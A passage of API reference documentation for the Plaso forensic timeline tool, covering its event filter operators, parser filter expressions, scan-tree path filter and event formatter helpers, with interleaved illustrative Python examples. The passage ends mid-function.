Returns True if the event, data and tag match the filter, False otherwise. Return type bool class plaso.filters.filters.Contains(arguments=None, **kwargs) Bases: plaso.filters.filters.GenericBinaryOperator Operator to determine if a value contains another value. class plaso.filters.filters.EqualsOperator(arguments=None, **kwargs) Bases: plaso.filters.filters.GenericBinaryOperator Equals (==) operator. class plaso.filters.filters.Filter(arguments=None) Bases: object Filter interface. args arguments provided to the filter. Type list[object] abstract Matches(event, event_data, event_data_stream, event_tag) Determines if the event, data and tag match the filter. Parameters • event (EventObject) – event to compare against the filter. • event_data (EventData) – event data to compare against the filter. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag to compare against the filter. Returns True if the event, data and tag match the filter, False otherwise. Return type bool class plaso.filters.filters.GenericBinaryOperator(arguments=None, **kwargs) Bases: plaso.filters.filters.BinaryOperator Shared functionality for common binary operators. FlipBool() Negates the internal boolean value attribute. Matches(event, event_data, event_data_stream, event_tag) Determines if the event, data and tag match the filter. Parameters • event (EventObject) – event to compare against the filter. • event_data (EventData) – event data to compare against the filter. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag to compare against the filter. Returns True if the event, data and tag match the filter, False otherwise. Return type bool


class plaso.filters.filters.GreaterEqualOperator(arguments=None, **kwargs)
    Bases: plaso.filters.filters.GenericBinaryOperator

    Greater than or equals (>=) operator.

class plaso.filters.filters.GreaterThanOperator(arguments=None, **kwargs)
    Bases: plaso.filters.filters.GenericBinaryOperator

    Greater than (>) operator.

class plaso.filters.filters.IdentityFilter(arguments=None)
    Bases: plaso.filters.filters.Operator

    A filter which always evaluates to True.

    Matches(event, event_data, event_data_stream, event_tag)
        Determines if the event, data and tag match the filter.

        Parameters
            • event (EventObject) – event to compare against the filter.
            • event_data (EventData) – event data to compare against the filter.
            • event_data_stream (EventDataStream) – event data stream.
            • event_tag (EventTag) – event tag to compare against the filter.

        Returns True if the event, data and tag match the filter, False otherwise.

        Return type bool

class plaso.filters.filters.InSet(arguments=None, **kwargs)
    Bases: plaso.filters.filters.GenericBinaryOperator

    Operator to determine if a value is part of another value.

class plaso.filters.filters.LessEqualOperator(arguments=None, **kwargs)
    Bases: plaso.filters.filters.GenericBinaryOperator

    Less than or equals (<=) operator.

class plaso.filters.filters.LessThanOperator(arguments=None, **kwargs)
    Bases: plaso.filters.filters.GenericBinaryOperator

    Less than (<) operator.

class plaso.filters.filters.NotEqualsOperator(arguments=None, **kwargs)
    Bases: plaso.filters.filters.GenericBinaryOperator

    Not equals (!=) operator.

class plaso.filters.filters.Operator(arguments=None)
    Bases: plaso.filters.filters.Filter

    Interface for filters that represent operators.

    abstract Matches(event, event_data, event_data_stream, event_tag)
        Determines if the event, data and tag match the filter.

        Parameters
            • event (EventObject) – event to compare against the filter.
            • event_data (EventData) – event data to compare against the filter.
            • event_data_stream (EventDataStream) – event data stream.
            • event_tag (EventTag) – event tag to compare against the filter.

        Returns True if the event, data and tag match the filter, False otherwise.

        Return type bool

class plaso.filters.filters.OrFilter(arguments=None)
    Bases: plaso.filters.filters.Filter

    A filter that performs a boolean OR on the arguments.

    Note that if no conditions are passed, all objects will pass.

    Matches(event, event_data, event_data_stream, event_tag)
        Determines if the event, data and tag match the filter.

        Parameters
            • event (EventObject) – event to compare against the filter.
            • event_data (EventData) – event data to compare against the filter.
            • event_data_stream (EventDataStream) – event data stream.
            • event_tag (EventTag) – event tag to compare against the filter.

        Returns True if the event, data and tag match the filter, False otherwise.

        Return type bool

class plaso.filters.filters.Regexp(arguments=None, **kwargs)
    Bases: plaso.filters.filters.GenericBinaryOperator

    Operator to determine if a value matches a regular expression.

    compiled_re
        compiled regular expression.

        Type ???

class plaso.filters.filters.RegexpInsensitive(arguments=None, **kwargs)
    Bases: plaso.filters.filters.Regexp

    Operator to determine if a value matches a regular expression.

plaso.filters.logger module

The filters sub module logger.

plaso.filters.parser_filter module

Helper for parser and plugin filter expressions.

class plaso.filters.parser_filter.ParserFilterExpressionHelper
    Bases: object

    Helper for parser and plugin filter expressions.

    A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. Each element can contain either:

    • The name of a preset (case sensitive), which is a predefined list of parsers and/or plugins (see data/presets.yaml for the default presets).
    • The name of a parser (case insensitive), for example 'msiecf'.
    • The name of a plugin, prefixed with the parser name and a '/', for example 'sqlite/chrome_history'.

    If the element begins with an exclamation mark ('!') the item will be excluded from the set of enabled parsers and plugins, otherwise the element will be included.

    ExpandPresets(presets_manager, expression)
        Expands all presets in a parser filter expression.

        Parameters
            • presets_manager (ParserPresetsManager) – a parser preset manager, that is used to resolve which parsers and/or plugins are defined by presets.
            • expression (str) – parser filter expression, where an empty expression represents all parsers and plugins. A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. Each element can be either:
                – The name of a preset (case sensitive), which is a predefined list of parsers and/or plugins (see data/presets.yaml for the default presets).
                – The name of a parser (case insensitive), for example 'msiecf'.
                – The name of a plugin, prefixed with the parser name and a '/', for example 'sqlite/chrome_history'.
              If the element begins with an exclamation mark ('!') the item will be excluded from the set of enabled parsers and plugins, otherwise the element will be included.

        Returns a parser filter expression where presets have been expanded or None to represent all parsers and plugins.

        Return type str

    SplitExpression(expression)
        Determines the excluded and included elements in an expression string.

        This method will not expand presets, and preset names are treated like parser names.

        Parameters expression (str) – parser filter expression. A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. Each element can be either:
            • The name of a preset (case sensitive), which is a predefined list of parsers and/or plugins (see data/presets.yaml for the default presets).
            • The name of a parser (case insensitive), for example 'msiecf'.
            • The name of a plugin, prefixed with the parser name and a '/', for example 'sqlite/chrome_history'.
          If the element begins with an exclamation mark ('!') the item will be excluded from the set of enabled parsers and plugins, otherwise the element will be included.

        Returns contains:
            excludes (dict[str, set[str]]): excluded presets, parsers and plugins. Dictionary keys are preset and/or parser names, and values are sets containing plugin names to enable for a parser or an asterisk character ('*') to represent all plugins, or that no specific plugins were specified.
            includes (dict[str, set[str]]): included presets, parsers and plugins. Dictionary keys are preset and/or parser names, and values are sets containing plugin names to enable for a parser or an asterisk character ('*') to represent all plugins, or that no specific plugins were specified.

        Return type tuple

plaso.filters.path_filter module
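The parser filter expression syntax described for ParserFilterExpressionHelper above, worked through as an added example that is not Plaso's own code. The preset table is constructed for the example (it stands in for data/presets.yaml), and the enable/exclude precedence in is_enabled is an assumption of the example, not Plaso's exact rules:

```python
"""Splitting and expanding Plaso-style parser filter expressions.

Added example for this page; it is not Plaso's ParserFilterExpressionHelper,
but it follows the syntax described above: comma separated elements, a leading
'!' to exclude, 'parser/plugin' to name a plugin and '*' for all plugins.
"""

# Constructed preset table standing in for data/presets.yaml (assumption).
PRESETS = {
    'browsers': ['msiecf', 'sqlite/chrome_history', 'sqlite/firefox_history'],
    'registry': ['winreg'],
}


def expand_presets(presets, expression):
    """Expands preset names in a parser filter expression.

    Preset names are case sensitive. A '!' in front of a preset excludes
    everything the preset defines. Returns None for an empty expression,
    which stands for all parsers and plugins.
    """
    if not expression:
        return None

    expanded = []
    for element in expression.split(','):
        element = element.strip()
        if not element:
            continue
        prefix = ''
        if element.startswith('!'):
            prefix, element = '!', element[1:]
        # A preset element is replaced by the parsers/plugins it defines;
        # anything else is passed through unchanged.
        for item in presets.get(element, [element]):
            expanded.append(prefix + item)
    return ','.join(expanded)


def split_expression(expression):
    """Splits an expression into excluded and included elements.

    Presets are not expanded here; a preset name is treated like a parser
    name. Returns (excludes, includes): dictionaries keyed by parser name
    whose values are sets of plugin names, or {'*'} when the whole parser
    was named.
    """
    excludes, includes = {}, {}
    for element in (expression or '').split(','):
        element = element.strip()
        if not element:
            continue
        target = includes
        if element.startswith('!'):
            target, element = excludes, element[1:]
        parser_name, _, plugin_name = element.partition('/')
        # Parser and plugin names are case insensitive.
        parser_name = parser_name.lower()
        plugin_name = plugin_name.lower() or '*'
        target.setdefault(parser_name, set()).add(plugin_name)
    return excludes, includes


def is_enabled(excludes, includes, parser_name, plugin_name=None):
    """Decides if a parser, or one of its plugins, survives the filter.

    The precedence used here is an assumption of this example, not Plaso's
    exact rules: an exclusion always wins; when anything is included, only
    included parsers and plugins are enabled; otherwise everything is.
    """
    parser_name = parser_name.lower()
    excluded = excludes.get(parser_name, set())
    if '*' in excluded or (plugin_name and plugin_name.lower() in excluded):
        return False
    if not includes:
        return True
    included = includes.get(parser_name, set())
    if plugin_name is None:
        return bool(included)
    return '*' in included or plugin_name.lower() in included


if __name__ == '__main__':
    expression = 'browsers,!sqlite/chrome_history,registry,!Msiecf'
    excludes, includes = split_expression(expand_presets(PRESETS, expression))
    print('excludes:', excludes)
    print('includes:', includes)
    print('sqlite/firefox_history enabled:',
          is_enabled(excludes, includes, 'sqlite', 'firefox_history'))
```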

A scan tree-based path filter implementation.

The scan tree is a tree based on multiple paths that contains the path segments per node. The most significant path segment is at the root and therefore compared first.

More information can be found here: https://github.com/libyal/libsigscan/wiki/Internals#scanning-tree-based-signature-scanning

The scan tree is used in the filter to filter provided paths.

class plaso.filters.path_filter.PathFilterScanTree(paths, case_sensitive=True, path_segment_separator='/')
    Bases: object

    Path filter scan tree.

    CheckPath(path, path_segment_separator=None)
        Checks if a path matches the scan tree-based path filter.

        Parameters
            • path (str) – path.
            • path_segment_separator (Optional[str]) – path segment separator, where None defaults to the path segment separator that was set when the path filter scan tree was initialized.

        Returns True if the path matches the filter, False otherwise.

        Return type bool

class plaso.filters.path_filter.PathFilterScanTreeNode(path_segment_index)
    Bases: object

    Class that implements a path filter scan tree node.

    The path filter scan tree node defines the path segments for a specific path segment index to filter. Each path segment will point to a scan object that indicates the next part of the path filter. A default value indicates the scan object to use next when there was no match.

    default_value
        the default scan object, which is either a scan tree sub node or a path.

        Type str|PathFilterScanTreeNode

    parent
        the parent path filter scan tree node or None if the node has no parent.

        Type PathFilterScanTreeNode

    path_segment_index
        path segment index represented by the node.

        Type int

    AddPathSegment(path_segment, scan_object)
        Adds a path segment.

        Parameters
            • path_segment (str) – path segment.
            • scan_object (str|PathFilterScanTreeNode) – a scan object, which is either a scan tree sub node or a path.

        Raises ValueError – if the node already contains a scan object for the path segment.

    GetScanObject(path_segment)
        Retrieves the scan object for a specific path segment.

        Parameters path_segment (str) – path segment.

        Returns a scan object, which is either a scan tree sub node, a path or the default value.

        Return type str|PathFilterScanTreeNode

    SetDefaultValue(scan_object)
        Sets the default (non-match) value.

        Parameters scan_object (str|PathFilterScanTreeNode) – a scan object, which is either a scan tree sub node or a path.

        Raises
            • TypeError – if the scan object is of an unsupported type.
            • ValueError – if the default value is already set.

    ToDebugString(indentation_level=1)
        Converts the path filter scan tree node into a debug string.

        Parameters indentation_level (int) – text indentation level.

        Returns debug string representing the path filter scan tree node.

        Return type str

    property path_segments
        path segments.

        Type list[str]

plaso.filters.value_types module
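The scan tree described above for PathFilterScanTree and PathFilterScanTreeNode, as an added example written for this page rather than Plaso's implementation. How the "most significant" segment index is chosen, and the filter paths themselves, are assumptions of the example:

```python
"""A scan tree-based path filter, modelled on the description above.

Added example for this page; it is not Plaso's PathFilterScanTree. Each node
tests one path segment index: a segment value maps to a scan object, which is
either a sub node or a full path to compare against, and the node's default
value is followed when no segment matches.
"""


class ScanTreeNode:
    """A node that tests the path segment at one index."""

    def __init__(self, path_segment_index):
        self.path_segment_index = path_segment_index
        self.path_segments = {}    # segment -> ScanTreeNode or path string
        self.default_value = None  # scan object used when no segment matches

    def add_path_segment(self, path_segment, scan_object):
        if path_segment in self.path_segments:
            raise ValueError('Segment already present: {0:s}'.format(path_segment))
        self.path_segments[path_segment] = scan_object

    def set_default_value(self, scan_object):
        if self.default_value is not None:
            raise ValueError('Default value already set.')
        self.default_value = scan_object


class PathFilterScanTree:
    """Matches paths against a set of filter paths using a scan tree."""

    def __init__(self, paths, case_sensitive=True, path_segment_separator='/'):
        self._case_sensitive = case_sensitive
        self._separator = path_segment_separator
        # Normalise and deduplicate so identical filter paths cannot recurse forever.
        unique_paths = {self._split(path) for path in paths}
        unique_paths.discard(())
        self.root = None
        if unique_paths:
            self.root = self._build_node(sorted(unique_paths), set())

    def _split(self, path):
        if not self._case_sensitive:
            path = path.lower()
        return tuple(segment for segment in path.split(self._separator) if segment)

    def _build_node(self, paths, used_indices):
        """Builds a node testing the most significant unused segment index.

        "Most significant" is taken here as the index with the most distinct
        values among the remaining paths (an assumption of this example).
        """
        longest = max(len(path) for path in paths)
        candidates = [i for i in range(longest) if i not in used_indices]
        best_index = max(candidates, key=lambda i: len(
            {path[i] for path in paths if i < len(path)}))
        node = ScanTreeNode(best_index)
        groups, shorter = {}, []
        for path in paths:
            if best_index < len(path):
                groups.setdefault(path[best_index], []).append(path)
            else:
                shorter.append(path)  # no segment at this index: default branch
        remaining = used_indices | {best_index}
        for segment, group in groups.items():
            node.add_path_segment(segment, self._scan_object(group, remaining))
        if shorter:
            node.set_default_value(self._scan_object(shorter, remaining))
        return node

    def _scan_object(self, paths, used_indices):
        """A single remaining path becomes a leaf; more paths need a sub node."""
        if len(paths) == 1:
            return self._separator.join(paths[0])
        return self._build_node(paths, used_indices)

    def check_path(self, path):
        """Returns True if path matches one of the filter paths."""
        segments = self._split(path)
        scan_object = self.root
        while isinstance(scan_object, ScanTreeNode):
            node = scan_object
            if node.path_segment_index < len(segments):
                segment = segments[node.path_segment_index]
                scan_object = node.path_segments.get(segment, node.default_value)
            else:
                scan_object = node.default_value
        # A leaf holds a full path: compare it, so partial matches are rejected.
        return scan_object is not None and scan_object == self._separator.join(segments)


# Constructed filter paths, not taken from any Plaso filter file.
FILTER_PATHS = [
    '/var/log/auth.log', '/var/log/syslog', '/var/log', '/etc/passwd',
    '/etc/hosts', '/home/alice/.bash_history']

if __name__ == '__main__':
    tree = PathFilterScanTree(FILTER_PATHS)
    for candidate in ['/var/log/syslog', '/var/log', '/usr/hosts', '/etc/shadow']:
        print(candidate, tree.check_path(candidate))
```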

Value types that can be used in an event filter.

class plaso.filters.value_types.DateTimeValueType(*args: Any, **kwargs: Any)
    Bases: dfdatetime.posix_time.

    Value type to represent a date and time value.


Module contents

5.1.7 plaso.formatters package

Submodules

plaso.formatters.chrome module

Google Chrome history custom event formatter helpers.

class plaso.formatters.chrome.ChromeHistoryTypedCountFormatterHelper
    Bases: plaso.formatters.interface.CustomEventFormatterHelper

    Google Chrome history typed count formatter helper.

    FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

    IDENTIFIER = 'chrome_history_typed_count'

plaso.formatters.chrome_preferences module

Google Chrome preferences custom event formatter helpers.

class plaso.formatters.chrome_preferences.ChromePreferencesPrimaryURLFormatterHelper
    Bases: plaso.formatters.interface.CustomEventFormatterHelper

    Google Chrome preferences primary URL formatter helper.

    FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

    IDENTIFIER = 'chrome_preferences_primary_url'

class plaso.formatters.chrome_preferences.ChromePreferencesSecondaryURLFormatterHelper
    Bases: plaso.formatters.interface.CustomEventFormatterHelper

    Google Chrome preferences secondary URL formatter helper.

    FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

    IDENTIFIER = 'chrome_preferences_secondary_url'


plaso.formatters.default module

The default event formatter.

class plaso.formatters.default.DefaultEventFormatter
    Bases: plaso.formatters.interface.BasicEventFormatter

    Formatter for events that do not have any defined formatter.

    DATA_TYPE = 'event'

    FORMAT_STRING = ' Attributes: {attribute_driven}'

    FORMAT_STRING_SHORT = ' {attribute_driven}'

    FormatEventValues(event_values)
        Formats event values using the helpers.

        Parameters event_values (dict[str, object]) – event values.

plaso.formatters.file_system module

File system custom event formatter helpers.

class plaso.formatters.file_system.NTFSFileReferenceFormatterHelper
    Bases: plaso.formatters.interface.CustomEventFormatterHelper

    NTFS file reference formatter helper.

    FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

    IDENTIFIER = 'ntfs_file_reference'

class plaso.formatters.file_system.NTFSParentFileReferenceFormatterHelper
    Bases: plaso.formatters.interface.CustomEventFormatterHelper

    NTFS parent file reference formatter helper.

    FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

    IDENTIFIER = 'ntfs_parent_file_reference'

class plaso.formatters.file_system.NTFSPathHintsFormatterHelper
    Bases: plaso.formatters.interface.CustomEventFormatterHelper

    NTFS path hints formatter helper.

    FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

    IDENTIFIER = 'ntfs_path_hints'


plaso.formatters.firefox module

Mozilla Firefox history custom event formatter helpers.

class plaso.formatters.firefox.FirefoxHistoryTypedCountFormatterHelper
    Bases: plaso.formatters.interface.CustomEventFormatterHelper

    Mozilla Firefox history typed count formatter helper.

    FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

    IDENTIFIER = 'firefox_history_typed_count'

class plaso.formatters.firefox.FirefoxHistoryURLHiddenFormatterHelper
    Bases: plaso.formatters.interface.CustomEventFormatterHelper

    Mozilla Firefox history URL hidden formatter helper.

    FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

    IDENTIFIER = 'firefox_history_url_hidden'

plaso.formatters.interface module

This file contains the event formatters interface classes.

The l2t_csv and other formats are dependent on a message field, referred to as description_long and description_short in l2t_csv. Plaso no longer stores these fields explicitly. A formatter, with a format string definition, is used to convert the event object values into a formatted string that is similar to the description_long and description_short field.

class plaso.formatters.interface.BasicEventFormatter(data_type='basic', format_string=None, format_string_short=None)
    Bases: plaso.formatters.interface.EventFormatter

    Format event values using a message format string.

    custom_helpers
        identifiers of custom event formatter helpers.

        Type list[str]

    helpers
        event formatter helpers.

        Type list[EventFormatterHelper]

    GetFormatStringAttributeNames()
        Retrieves the attribute names in the format string.

        Returns attribute names.

        Return type set(str)

    GetMessage(event_values)
        Determines the message.

        Parameters event_values (dict[str, object]) – event values.

        Returns message.

        Return type str

    GetMessageShort(event_values)
        Determines the short message.

        Parameters event_values (dict[str, object]) – event values.

        Returns short message.

        Return type str

class plaso.formatters.interface.BooleanEventFormatterHelper(input_attribute=None, output_attribute=None, value_if_false=None, value_if_true=None)
    Bases: plaso.formatters.interface.EventFormatterHelper

    Helper for formatting boolean event data.

    input_attribute
        name of the attribute that contains the boolean input value.

        Type str

    output_attribute
        name of the attribute where the boolean output value should be stored.

        Type str

    value_if_false
        output value if the boolean input value is False.

        Type str

    value_if_true
        output value if the boolean input value is True.

        Type str

    FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

class plaso.formatters.interface.ConditionalEventFormatter(data_type='conditional', format_string_pieces=None, format_string_separator=None, format_string_short_pieces=None)
    Bases: plaso.formatters.interface.EventFormatter

    Conditionally format event values using format string pieces.

    GetFormatStringAttributeNames()
        Retrieves the attribute names in the format string.

        Returns attribute names.

        Return type set(str)

    GetMessage(event_values)
        Determines the message.

        Parameters event_values (dict[str, object]) – event values.

        Returns message.

        Return type str

    GetMessageShort(event_values)
        Determines the short message.

        Parameters event_values (dict[str, object]) – event values.

        Returns short message.

        Return type str

class plaso.formatters.interface.CustomEventFormatterHelper
    Bases: plaso.formatters.interface.EventFormatterHelper

    Base class for a helper for custom formatting of event data.

    DATA_TYPE = ''

    abstract FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

    IDENTIFIER = ''

class plaso.formatters.interface.EnumerationEventFormatterHelper(default=None, input_attribute=None, output_attribute=None, values=None)
    Bases: plaso.formatters.interface.EventFormatterHelper

    Helper for formatting enumeration event data.

    default
        default value.

        Type str

    input_attribute
        name of the attribute that contains the enumeration input value.

        Type str

    output_attribute
        name of the attribute where the enumeration output value should be stored.

        Type str

    values
        mapping of enumeration input and output values.

        Type dict[str, str]

    FormatEventValues(event_values)
        Formats event values using the helper.

        If default value is None and there is no corresponding enumeration value then the original value is used.

        Parameters event_values (dict[str, object]) – event values.

class plaso.formatters.interface.EventFormatter(data_type='internal')
    Bases: object

    Base class to format event values.

    custom_helpers
        identifiers of custom event formatter helpers.

        Type list[str]

    helpers
        event formatter helpers.

        Type list[EventFormatterHelper]

    AddCustomHelper(identifier, input_attribute=None, output_attribute=None)
        Adds a custom event formatter helper.

        Parameters
            • identifier (str) – identifier.
            • input_attribute (Optional[str]) – name of the attribute that contains the input value.
            • output_attribute (Optional[str]) – name of the attribute where the output value should be stored.

    AddHelper(helper)
        Adds an event formatter helper.

        Parameters helper (EventFormatterHelper) – event formatter helper to add.

    FormatEventValues(event_values)
        Formats event values using the helpers.

        Parameters event_values (dict[str, object]) – event values.

    abstract GetFormatStringAttributeNames()
        Retrieves the attribute names in the format string.

        Returns attribute names.

        Return type set(str)

    abstract GetMessage(event_values)
        Determines the message.

        Parameters event_values (dict[str, object]) – event values.

        Returns message.

        Return type str

    abstract GetMessageShort(event_values)
        Determines the short message.

        Parameters event_values (dict[str, object]) – event values.

        Returns short message.

        Return type str

    property data_type
        unique identifier for the event data supported by the formatter.

        Type str

class plaso.formatters.interface.EventFormatterHelper
    Bases: object

    Base class of helper for formatting event data.

    abstract FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

class plaso.formatters.interface.FlagsEventFormatterHelper(input_attribute=None, output_attribute=None, values=None)
    Bases: plaso.formatters.interface.EventFormatterHelper

    Helper for formatting flags event data.

    input_attribute
        name of the attribute that contains the flags input value.

        Type str

    output_attribute
        name of the attribute where the flags output value should be stored.

        Type str

    values
        mapping of flags input and output values.

        Type dict[str, str]

    FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

plaso.formatters.logger module

The formatters sub module logger.

plaso.formatters.manager module

Manages custom event formatter helpers.

class plaso.formatters.manager.FormattersManager
    Bases: object

    Custom event formatter helpers manager.

    classmethod GetEventFormatterHelper(identifier)
        Retrieves a custom event formatter helper.

        Parameters identifier (str) – identifier.

        Returns custom event formatter or None if not available.

        Return type CustomEventFormatterHelper

    classmethod RegisterEventFormatterHelper(formatter_helper_class)
        Registers a custom event formatter helper.

        The custom event formatter helpers are identified based on their lower case identifier.

        Parameters formatter_helper_class (type) – class of the custom event formatter helper.

        Raises KeyError – if a custom formatter helper is already set for the corresponding identifier.

    classmethod RegisterEventFormatterHelpers(formatter_helper_classes)
        Registers custom event formatter helpers.

        The formatter classes are identified based on their lower case data type.

        Parameters formatter_helper_classes (list[type]) – classes of the custom event formatter helpers.

        Raises KeyError – if a custom formatter helper is already set for the corresponding data type.

plaso.formatters.msiecf module

MSIE cache file custom event formatter helpers.

class plaso.formatters.msiecf.MSIECFCachedPathFormatterHelper
    Bases: plaso.formatters.interface.CustomEventFormatterHelper

    MSIE cache file cached path formatter helper.

    FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

    IDENTIFIER = 'msiecf_cached_path'

class plaso.formatters.msiecf.MSIECFHTTPHeadersventFormatterHelper
    Bases: plaso.formatters.interface.CustomEventFormatterHelper

    MSIE cache file HTTP headers formatter helper.

    FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

    IDENTIFIER = 'msiecf_http_headers'

plaso.formatters.shell_items module

Windows shell item custom event formatter helpers.

class plaso.formatters.shell_items.ShellItemFileEntryNameFormatterHelper
    Bases: plaso.formatters.interface.CustomEventFormatterHelper

    Windows shell item file entry formatter helper.

    FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

    IDENTIFIER = 'shell_item_file_entry_name'

plaso.formatters.winevt_rc module

Windows Event Log resources database reader.

class plaso.formatters.winevt_rc.Sqlite3DatabaseFile
    Bases: object

    Class that defines a sqlite3 database file.

    Close()
        Closes the database file.

        Raises RuntimeError – if the database is not opened.

    GetValues(table_names, column_names, condition)
        Retrieves values from a table.

        Parameters
            • table_names (list[str]) – table names.
            • column_names (list[str]) – column names.
            • condition (str) – query condition such as "log_source == 'Application Error'".

        Yields sqlite3.row – row.

        Raises RuntimeError – if the database is not opened.

    HasTable(table_name)
        Determines if a specific table exists.

        Parameters table_name (str) – table name.

        Returns True if the table exists.

        Return type bool

        Raises RuntimeError – if the database is not opened.

    Open(filename, read_only=False)
        Opens the database file.

        Parameters
            • filename (str) – filename of the database.
            • read_only (Optional[bool]) – True if the database should be opened in read-only mode. Since sqlite3 does not support a real read-only mode we fake it by only permitting SELECT queries.

        Returns True if successful.

        Return type bool

        Raises RuntimeError – if the database is already opened.

class plaso.formatters.winevt_rc.Sqlite3DatabaseReader
    Bases: object

    Class to represent a sqlite3 database reader.

    Close()
        Closes the database reader object.

    Open(filename)
        Opens the database reader object.

        Parameters filename (str) – filename of the database.

        Returns True if successful.

        Return type bool

class plaso.formatters.winevt_rc.WinevtResourcesSqlite3DatabaseReader
    Bases: plaso.formatters.winevt_rc.Sqlite3DatabaseReader

    Class to represent a sqlite3 Event Log resources database reader.

    GetMessage(log_source, lcid, message_identifier)
        Retrieves a specific message for a specific Event Log source.

        Parameters
            • log_source (str) – Event Log source.
            • lcid (int) – language code identifier (LCID).
            • message_identifier (int) – message identifier.

        Returns message string or None if not available.

        Return type str

    GetMetadataAttribute(attribute_name)
        Retrieves the metadata attribute.

        Parameters attribute_name (str) – name of the metadata attribute.

        Returns the metadata attribute or None.

        Return type str

        Raises RuntimeError – if more than one value is found in the database.

    Open(filename)
        Opens the database reader object.

        Parameters filename (str) – filename of the database.

        Returns True if successful.

        Return type bool

        Raises RuntimeError – if the version or string format of the database is not supported.

plaso.formatters.winlnk module

Windows Shortcut (LNK) custom event formatter helpers.

class plaso.formatters.winlnk.WindowsShortcutLinkedPathFormatterHelper
    Bases: plaso.formatters.interface.CustomEventFormatterHelper

    Windows Shortcut (LNK) linked path formatter helper.

    FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

    IDENTIFIER = 'windows_shortcut_linked_path'


plaso.formatters.winprefetch module

Windows Prefetch custom event formatter helpers.

class plaso.formatters.winprefetch.WindowsPrefetchPathHintsFormatterHelper
    Bases: plaso.formatters.interface.CustomEventFormatterHelper

    Windows Prefetch path hints formatter helper.

    FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

    IDENTIFIER = 'windows_prefetch_path_hints'

class plaso.formatters.winprefetch.WindowsPrefetchVolumesStringFormatterHelper
    Bases: plaso.formatters.interface.CustomEventFormatterHelper

    Windows Prefetch volumes string formatter helper.

    FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

    IDENTIFIER = 'windows_prefetch_volumes_string'

plaso.formatters.winreg module

Windows Registry custom event formatter helpers.

class plaso.formatters.winreg.WindowsRegistryValuesFormatterHelper
    Bases: plaso.formatters.interface.CustomEventFormatterHelper

    Windows Registry values formatter helper.

    FormatEventValues(event_values)
        Formats event values using the helper.

        Parameters event_values (dict[str, object]) – event values.

    IDENTIFIER = 'windows_registry_values'

plaso.formatters.yaml_formatters_file module

YAML-based formatters file.

class plaso.formatters.yaml_formatters_file.YAMLFormattersFile
    Bases: object

    YAML-based formatters file.

    A YAML-based formatters file contains one or more event formatters.

        type: 'conditional'
        data_type: 'fs:stat'
        message:
        - '{display_name}'
        - 'Type: {file_entry_type}'
        - '({unallocated})'
        short_message:
        - '(unknown)'

    Where:

    • type, defines the formatter data type, which can be "basic" or "conditional";
    • data_type, defines the corresponding event data type;
    • message, defines a list of message string pieces;
    • separator, defines the message and short message string pieces separator;
    • short_message, defines the short message string pieces;

    ReadFromFile(path)
        Reads the event formatters from the YAML-based formatters file.

        Parameters path (str) – path to a formatters file.

        Returns event formatters.

        Return type list[EventFormatter]
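Conditional formatting, as described for ConditionalEventFormatter in plaso.formatters.interface and in the YAML definition above, worked through as an added example written for this page (not Plaso's formatter or YAML reader code). The definitions are inline dicts mirroring the YAML layout, the fs:stat one copied from the fragment above; the single-space default separator and the second definition are assumptions of the example:

```python
"""Basic and conditional event formatters driven by YAML-style definitions.

Added example for this page, not Plaso's own formatters code. The definitions
are Python dicts mirroring the YAML layout shown above (type, data_type,
message, short_message, optional separator); a conditional message piece is
only emitted when every attribute it references is present in the event values.
"""
import string


def attribute_names(format_string):
    """Returns the set of attribute names referenced by a format string."""
    return {field for _, field, _, _ in string.Formatter().parse(format_string)
            if field}


class BasicFormatter:
    """Formats event values with a single message format string."""

    def __init__(self, definition):
        self.data_type = definition['data_type']
        self._format_string = definition['message']
        self._format_string_short = definition.get(
            'short_message', self._format_string)

    def get_format_string_attribute_names(self):
        return attribute_names(self._format_string)

    def get_message(self, event_values):
        return self._format_string.format(**event_values)

    def get_message_short(self, event_values):
        return self._format_string_short.format(**event_values)


class ConditionalFormatter:
    """Joins only those message pieces whose attributes are all available."""

    def __init__(self, definition):
        self.data_type = definition['data_type']
        self._pieces = definition['message']
        self._short_pieces = definition.get('short_message', self._pieces)
        # A single space separator when none is defined (assumption).
        self._separator = definition.get('separator', ' ')

    def _format(self, pieces, event_values):
        parts = []
        for piece in pieces:
            names = attribute_names(piece)
            # Pieces without attributes (such as '(unknown)') are always kept.
            if all(event_values.get(name) is not None for name in names):
                parts.append(piece.format(**event_values))
        return self._separator.join(parts)

    def get_format_string_attribute_names(self):
        names = set()
        for piece in self._pieces:
            names |= attribute_names(piece)
        return names

    def get_message(self, event_values):
        return self._format(self._pieces, event_values)

    def get_message_short(self, event_values):
        return self._format(self._short_pieces, event_values)


def load_formatters(definitions):
    """Builds formatters from definitions, as a formatters file reader would.

    Raises ValueError for an unknown type, a missing data_type or a
    data_type defined twice.
    """
    formatters, seen = [], set()
    for definition in definitions:
        formatter_type = definition.get('type')
        data_type = definition.get('data_type')
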